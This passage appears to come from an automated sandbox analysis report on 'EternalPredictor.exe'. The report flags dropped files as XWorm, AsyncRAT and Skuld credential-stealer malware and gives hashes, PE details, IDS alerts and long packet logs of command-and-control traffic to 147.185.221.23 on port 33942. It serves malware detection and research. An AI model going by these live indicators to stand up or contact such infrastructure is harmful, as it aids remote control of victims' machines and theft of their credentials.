• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.............................+... ...@....@.. ....................................@.................................P+..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......0^.. .......&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r7..p*. .O..*.r...p*.rm..p*. ....*.r...p*. .&..*.r...p*. ....*..((...*.r...p*. .A..*.r...p*. E/..*"(....+.*&(....&+.*.+5sT... .... .'..oU...(,...~....-.(D...(6...~....oV...&.-.*.r...p*. *p{.*.r...p*. ^...*.r...p*. ....*.r...p*.r1..p*. t...*..............j..................sW..............*"(F...+.*:.t....(A...+.*.r]..p*
Process:C:\Users\user\Desktop\EternalPredictor.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):71168
Entropy (8bit):6.026372989128195
Encrypted:false
SSDEEP:1536:dEmkVu+xslqytUTZfJM6htYxrlYCbM1/kCxtD6LOSIcRGPUC:dEZZx8q/fJLtYFZbM1segO3cQ8C
MD5:7439CC991A9A756C41153B8E9121BAAB
SHA1:C62528386E5F62FF2975CC8ED0CAD3A7D362E632
SHA-256:31A2B821E933BB193D94438D4A5AA036519535336C936D65B66889FB03164E2D
SHA-512:CBDFD77671884407F8F4BD9C5251DF5D8896B29BD004EA52460EDA8A222DF7492C69572E044376315624220F3EA66DE3AFF34323EA281591CA2975F90FA6DD51
Malicious:true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: ditekSHen
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.............................+... ...@....@.. ....................................@.................................P+..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......0^.. .......&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r7..p*. .O..*.r...p*.rm..p*. ....*.r...p*. .&..*.r...p*. ....*..((...*.r...p*. .A..*.r...p*. E/..*"(....+.*&(....&+.*.+5sT... .... .'..oU...(,...~....-.(D...(6...~....oV...&.-.*.r...p*. *p{.*.r...p*. ^...*.r...p*. ....*.r...p*.r1..p*. t...*..............j..................sW..............*"(F...+.*:.t....(A...+.*.r]..p*
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\EternalPredictor.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):7954796
Entropy (8bit):7.993357815338302
Encrypted:true
SSDEEP:196608:7YHYUNwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jL:4CIHziK1piXLGVE4Ue0VJ3
MD5:3E6865657B29FAEA3A355C710F0AAD45
SHA1:AD9B98FA0F96685ABC17AAAB7FE4D65AC8FE34F7
SHA-256:2C48F7BC874F1C812C0031519E756C28F940A58B2F64CDB40A08F1CCC798F671
SHA-512:B360B5A244E83EE95719D7E781B9A49A29A5251E936619786B0151D0992AEE33746109B3A8B0AB8D18C2788B738892C9B296C8C601025E16D850D730837B1615
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 45%
Reputation:unknown
Process:C:\Users\user\Desktop\EternalPredictor.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):10375680
Entropy (8bit):6.306827139596188
Encrypted:false
SSDEEP:98304:OhoRYXiOhqugpWWNeWTQLc4u0u08eOEaB2v/ZmMz/:ao3OhqFHIrLc4uB08erlNz/
MD5:DBBD2127D1030E4C9548FDF7DE9983A7
SHA1:5B7939A94CBD908AD8F57BB2E5328CCE657C3700
SHA-256:8E3601302C0294914808B6537CD27DE961D087BA0807590B981B7F8C8AA5EEE6
SHA-512:95A1112C9B062745DF9C20F566CFCB9421221111D02DB0C1A940A5EA230B09C39A487685AE674C350E4641132E3360A19CA0CD8762F7E46CECDE8B7DD85FE5D2
Malicious:true
Yara Hits:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
• Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Reputation:unknown
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.999079241862902
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:EternalPredictor.exe
File size:18'412'032 bytes
MD5:7d207c243b33d6f3d78acadffd95ae0e
SHA1:a3ad8109c208b12d35359e78f4ebc23ed79ccf24
SHA256:dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
SHA512:ac9740408cd0dc7ff93835defed55af7359456eaa2cd092704e6f7ffe5fa3ea3b87d9ab927e4c06e96f9c030f8dc14cffe157ccf74618aa4ea9c33d875fca0fd
SSDEEP:393216:U8o6tLbdhAQdfxvzbjv1sIUO82oi61Mlk+kv4af0ADcOeIsP:UsbPJpvpn82oi6ulkPLf0WcOeR
TLSH:3307121F61DC1798E4FA8A7555533E3C1E6499FA31EB68BC1A4210CCB07F78C2F8A499
Icon Hash:00928e8e8686b000
Entrypoint:0x159068e
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x671B8501 [Fri Oct 25 11:46:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:v4.0.30319
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1190634 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1192000 | 0x500 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1194000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x118e694 | 0x118e800 | adcee02768fa6176c74482f4df4e937a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1192000 | 0x500 | 0x600 | 3d7b19024a26d901bdeba68e7b96bfc8 | False | 0.37890625 | data | 3.784430201595601 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x1194000 | 0xc | 0x200 | bcba337246c8a2a7e5ca5c83ddef6cfa | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x11920a0 | 0x26c | data | | | 0.45161290322580644 |
| RT_MANIFEST | 0x1192310 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-17T11:22:55.644302+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49725 | 147.185.221.23 | 33942 | TCP |
| 2024-11-17T11:23:34.191338+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49728 | 147.185.221.23 | 33942 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 17, 2024 11:21:20.381946087 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:20.381989002 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.382070065 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:20.384108067 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:20.384133101 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.990197897 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.990518093 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:20.990534067 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.990643024 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:20.990647078 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.991957903 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:20.992028952 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.052766085 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.052867889 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.053057909 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:21.100411892 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.100429058 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:21.149039030 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.230791092 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:21.230861902 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:21.231141090 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.231197119 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.231209040 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:21.231242895 CET | 49706 | 443 | 192.168.2.8 | 172.67.74.152 |
| Nov 17, 2024 11:21:21.231247902 CET | 443 | 49706 | 172.67.74.152 | 192.168.2.8 |
| Nov 17, 2024 11:21:22.060280085 CET | 49707 | 80 | 192.168.2.8 | 208.95.112.1 |
| Nov 17, 2024 11:21:22.065238953 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.8 |
| Nov 17, 2024 11:21:22.065371990 CET | 49707 | 80 | 192.168.2.8 | 208.95.112.1 |
| Nov 17, 2024 11:21:22.065615892 CET | 49707 | 80 | 192.168.2.8 | 208.95.112.1 |
| Nov 17, 2024 11:21:22.070451975 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.8 |
| Nov 17, 2024 11:21:22.714550018 CET | 80 | 49707 | 208.95.112.1 | 192.168.2.8 |
| Nov 17, 2024 11:21:22.769289017 CET | 49707 | 80 | 192.168.2.8 | 208.95.112.1 |
| Nov 17, 2024 11:21:23.682017088 CET | 49709 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:23.687103033 CET | 33942 | 49709 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:23.687181950 CET | 49709 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:24.364197969 CET | 49709 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:24.369103909 CET | 33942 | 49709 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:31.941565990 CET | 49707 | 80 | 192.168.2.8 | 208.95.112.1 |
| Nov 17, 2024 11:21:32.162045956 CET | 33942 | 49709 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:32.162600994 CET | 49709 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:33.810565948 CET | 49709 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:33.814526081 CET | 49712 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:33.815797091 CET | 33942 | 49709 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:33.819504023 CET | 33942 | 49712 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:33.819582939 CET | 49712 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:34.125477076 CET | 49712 | 33942 | 192.168.2.8 | 147.185.221.23 |
| Nov 17, 2024 11:21:34.130392075 CET | 33942 | 49712 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:42.308017969 CET | 33942 | 49712 | 147.185.221.23 | 192.168.2.8 |
| Nov 17, 2024 11:21:42.308120012 CET | 49712 | 33942 | 192.168.2.8 | 147.185.221.23 |
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.544459105 CET4971233942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.546437025 CET4971333942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.549386978 CET3394249712147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.551361084 CET3394249713147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.551450014 CET4971333942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.745172977 CET4971333942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:42.750530958 CET3394249713147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.033128977 CET3394249713147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.033200026 CET4971333942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.452724934 CET4971333942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.454390049 CET4971533942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.457693100 CET3394249713147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.459347963 CET3394249715147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.459414005 CET4971533942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.487524033 CET4971533942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.492501974 CET3394249715147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.809658051 CET4971680192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.814533949 CET8049716208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.814594984 CET4971680192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.814764023 CET4971680192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:51.819557905 CET8049716208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:52.427078962 CET8049716208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:52.452069044 CET4971680192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.131457090 CET4971780192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.136503935 CET8049717208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.136584044 CET4971780192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.136667967 CET4971780192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.141458035 CET8049717208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.783755064 CET8049717208.95.112.1192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.831119061 CET4971780192.168.2.8208.95.112.1
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.941916943 CET3394249715147.185.221.23192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:21:59.942078114 CET4971533942192.168.2.8147.185.221.23
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.189515114 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.189583063 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.189694881 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.221314907 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.221409082 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.828313112 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.829054117 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.829140902 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.830085993 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.830171108 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.831686974 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.831974983 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832068920 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832087040 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832273006 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832319975 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832462072 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832498074 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832633972 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832667112 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832813978 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832839966 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832870007 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832884073 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832928896 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832946062 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832950115 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832958937 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.832987070 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833003998 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833024025 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833041906 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833071947 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833086967 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833126068 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833142996 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833170891 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833194017 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833338022 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833376884 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833400965 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.833439112 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.837297916 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.837330103 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.837353945 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842665911 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842757940 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842780113 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842854977 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842875004 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842910051 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842926979 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.842959881 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843009949 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843105078 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843132019 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843163013 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843216896 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.843235970 CET49718443192.168.2.8162.159.128.233
                                                                                                                                                                                                                                Nov 17, 2024 11:22:00.847656965 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:01.601367950 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:01.601448059 CET44349718162.159.128.233192.168.2.8
                                                                                                                                                                                                                                Nov 17, 2024 11:22:01.601665020 CET49718443192.168.2.8162.159.128.233
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 17, 2024 11:22:01.602178097 CET  49718        443        192.168.2.8      162.159.128.233
Nov 17, 2024 11:22:01.602637053 CET  49717        80         192.168.2.8      208.95.112.1
Nov 17, 2024 11:22:01.608247995 CET  80           49717      208.95.112.1     192.168.2.8
Nov 17, 2024 11:22:01.608306885 CET  49717        80         192.168.2.8      208.95.112.1
Nov 17, 2024 11:22:02.539956093 CET  49715        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:02.545005083 CET  33942        49715      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:02.588136911 CET  49719        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:02.593033075 CET  33942        49719      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:02.593110085 CET  49719        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:02.692766905 CET  49719        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:02.697774887 CET  33942        49719      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:11.075797081 CET  33942        49719      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:11.075859070 CET  49719        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:13.018870115 CET  49719        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:13.019710064 CET  49721        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:13.023669958 CET  33942        49719      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:13.024532080 CET  33942        49721      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:13.024602890 CET  49721        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:13.042632103 CET  49721        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:13.047728062 CET  33942        49721      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:21.512634039 CET  33942        49721      147.185.221.23   192.168.2.8
Nov 17, 2024 11:22:21.512753963 CET  49721        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:21.643969059 CET  49721        33942      192.168.2.8      147.185.221.23
Nov 17, 2024 11:22:21.645735025 CET  49722        33942      192.168.2.8      147.185.221.23
